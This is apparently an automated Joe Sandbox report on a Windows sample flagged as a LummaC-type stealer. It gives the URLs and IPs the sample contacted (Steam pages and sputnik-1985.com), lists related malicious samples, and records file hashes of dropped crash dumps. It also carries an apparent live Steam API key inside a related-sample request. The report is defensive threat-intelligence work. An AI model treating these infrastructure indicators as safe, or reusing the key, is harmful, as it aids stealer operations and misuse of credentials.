https://store.steampowered.com/steam_refunds/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://x1.c.lencr.org/0 | Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://x1.i.lencr.org/0 | Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://steamcommunity.com/workshop/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://login.steampowered.com/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb | Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://support.mozilla.org/products/firefoxgro.all | Source: xNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://store.steampowered.com/legal/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://recaptcha.net | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://upx.sf.net | Source: Amcache.hve.10.dr | Malicious: false | Reputation: high
https://store.steampowered.com/ | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://127.0.0.1:27060 | Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e | Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
Legend (share of analysed samples contacting the IP):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
104.21.80.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | false
General Information

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588972
Start date and time: 2025-01-11 07:47:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xNuh0DUJaG.exe (renamed because original name is a hash value)
Original Sample Name: 9b3e0c8c483f0708b9dc9c18ce46d0bc.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 19
• Number of non-executed functions: 233
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 40.126.32.133, 52.149.20.212
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      01:48:33API Interceptor6x Sleep call for process: xNuh0DUJaG.exe modified
                                                                                                                                                                                                                                      01:48:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                      • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                      http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                      104.21.80.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.aziziyeescortg.xyz/2pcx/
                                                                                                                                                                                                                                      qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.mzkd6gp5.top/0hqe/
                                                                                                                                                                                                                                      6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                      • clientservices.sgoogleapis.observer/api/index.php
                                                                                                                                                                                                                                      http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • my.cradaygo.com/smmylet
                                                                                                                                                                                                                                      SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.dejikenkyu.cyou/pmpa/
                                                                                                                                                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                      • hiranetwork.com/administrator/index.php
                                                                                                                                                                                                                                      downloader2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                      • 2k8u3.org/wininit.exe
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      steamcommunity.comSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      davies.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      sputnik-1985.comSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      fghj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                                      filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.48.1
                                                                                                                                                                                                                                      expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      CLOUDFLARENETUSc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                      • 104.21.80.1
                                                                                                                                                                                                                                      ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                      grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                                      ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                                                                                      • 104.21.75.48
                                                                                                                                                                                                                                      AKAMAI-ASUSSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 96.17.64.171
                                                                                                                                                                                                                                      invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 96.17.64.171
                                                                                                                                                                                                                                      Message 2.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.102.34.105
                                                                                                                                                                                                                                      frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 95.101.248.46
                                                                                                                                                                                                                                      Message.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                      • 104.102.49.254
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
Setup.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
Setup.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
Setup.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
Full-Ver_Setup.exe | malicious | LummaC Stealer | 104.102.49.254, 104.21.80.1
https://patiooutletmaipu.cl/tiendas/head/ | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | 104.102.49.254, 104.21.80.1
Mmm7GmDcR4.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
random.exe | malicious | LummaC Stealer | 104.102.49.254, 104.21.80.1
HouseholdsClicking.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
davies.exe | malicious | LummaC | 104.102.49.254, 104.21.80.1
No context

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):1.0584563712396
Encrypted:false
SSDEEP:384:Ml4GuIZQuKaVHgBz+jDnzuiFcY4IO8ksW:CcaVHljDzuiFcY4IO8
MD5:3C5E40205395A4FFAE01765C2A2DB793
SHA1:F1D4D185D7800BB34A49CE3CD69B548B956ACA7E
SHA-256:73391DB38675F68CA26E5B52F7BF29CD959BCC3232F3CDCDA42EE091542C5BFC
SHA-512:9A37508471EDBF275F281559463261A3C3EB9EE1909048159A4702D1C59F9160DA0835DC39179665DAA2CAA8EA77FCF006902B7DDF6F55163B0C495BFEF0B267
Malicious:true
Reputation:low
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.1.7.2.0.7.4.8.6.0.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.1.7.2.1.8.1.1.1.0.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.3.4.b.1.f.e.-.d.6.f.8.-.4.0.b.d.-.9.a.f.8.-.2.f.6.7.3.e.e.8.b.3.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.c.9.8.1.a.1.-.3.0.5.3.-.4.f.5.e.-.b.c.9.e.-.1.f.c.7.d.0.6.b.a.f.0.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.N.u.h.0.D.U.J.a.G...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.8.-.0.0.0.1.-.0.0.1.3.-.5.2.2.3.-.5.1.d.3.f.4.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.6.0.d.7.b.e.6.e.9.8.6.3.f.5.4.e.6.3.0.e.1.3.c.c.c.8.b.a.6.a.6.0.0.0.0.4.2.0.7.!.0.0.0.0.f.d.9.5.3.6.9.0.8.2.e.2.b.8.6.9.b.1.8.4.3.9.1.a.a.9.2.6.8.f.a.6.4.3.7.0.f.4.a.7.!.x.N.u.h.0.D.U.J.a.G...e.x.e.....T.a.r.g.e.t.A.p.p.

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Sat Jan 11 06:48:41 2025, 0x1205a4 type
Category:dropped
Size (bytes):116914
Entropy (8bit):2.1841367739001427
Encrypted:false
SSDEEP:384:nVj+mJt7BfHdSCAXULJwCTh7stHWgTREDnXxTWCChGy6:gE7BfXAELJwY08nXIjGz
MD5:977E9402E5EB174E4DAC25781A86C493
SHA1:ED03A123CB106876A6A112BD4711C96B100AE523
SHA-256:5180998F92EB111B539975AEEA4FF585E492ED18CD245CF56BB1873425A6671C
SHA-512:0E0537C9B31A14322798217FC42C58D5311F5436D4BD4BF578976CCEFD0E60F47AA4FD4C95A08E8B5A9C8482539761170C993E4FC4D94406DC17A4248D7252E0
Malicious:false
Reputation:low
Preview:MDMP..a..... .......I..g........................p...(............$...........R..........`.......8...........T............F..............4%.......... '..............................................................................eJ.......'......GenuineIntel............T.......(...>..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8358
Entropy (8bit):3.7012770539098723
Encrypted:false
SSDEEP:192:R6l7wVeJUVjR63Pd96YWLSU9l+4gmfuYriKGlpD+89bxGsfP77m:R6lXJUpR6V96YKSU9l+4gmfuYriKGHxA
MD5:544797702E9C5C5F476F771082845BCE
SHA1:B4DD92E03973141720251FF84B0DF7379721F7A0
SHA-256:DD47E2966BEF5AD7CA214A7B710B22DDB7BE0DFFBF955A5F76F16FD292478D91
SHA-512:E44951E20A077BC13847984C1C9CAFF385EDB2B7B1B8868D54683F23DA33AAAE4C8F9BD0744AEDCEEE14BBF6DC64F02977710D98B5DD01DC13C571082128F969
Malicious:false
Reputation:low
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.4.<./.P.i.

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4623
Entropy (8bit):4.50557268151071
Encrypted:false
SSDEEP:48:cvIwWl8zsAJg77aI9LQWpW8VY4vYm8M4JxXOqF9FN+q8D2O80LNDN5d:uIjfGI7tp7V/yJZZFNl90BZ5d
MD5:C4BDC7A326650326567612084ED59E73
SHA1:9567AD567BC550D6D29F66206836727739F9D467
SHA-256:917FC09B21ACEA6DC6359DC2B13BDBA53AB3A654423C9FFEFAFCF6757E92EE53
SHA-512:9A4DDCD7514DF9B9F01786905BC967400268406FC48DC01B9B8AE5DA5DF32713932FC43B9B5526DDE4D4076D9B5CE0950EFC797E905EEED19325B3379E8758A2
Malicious:false
Reputation:low
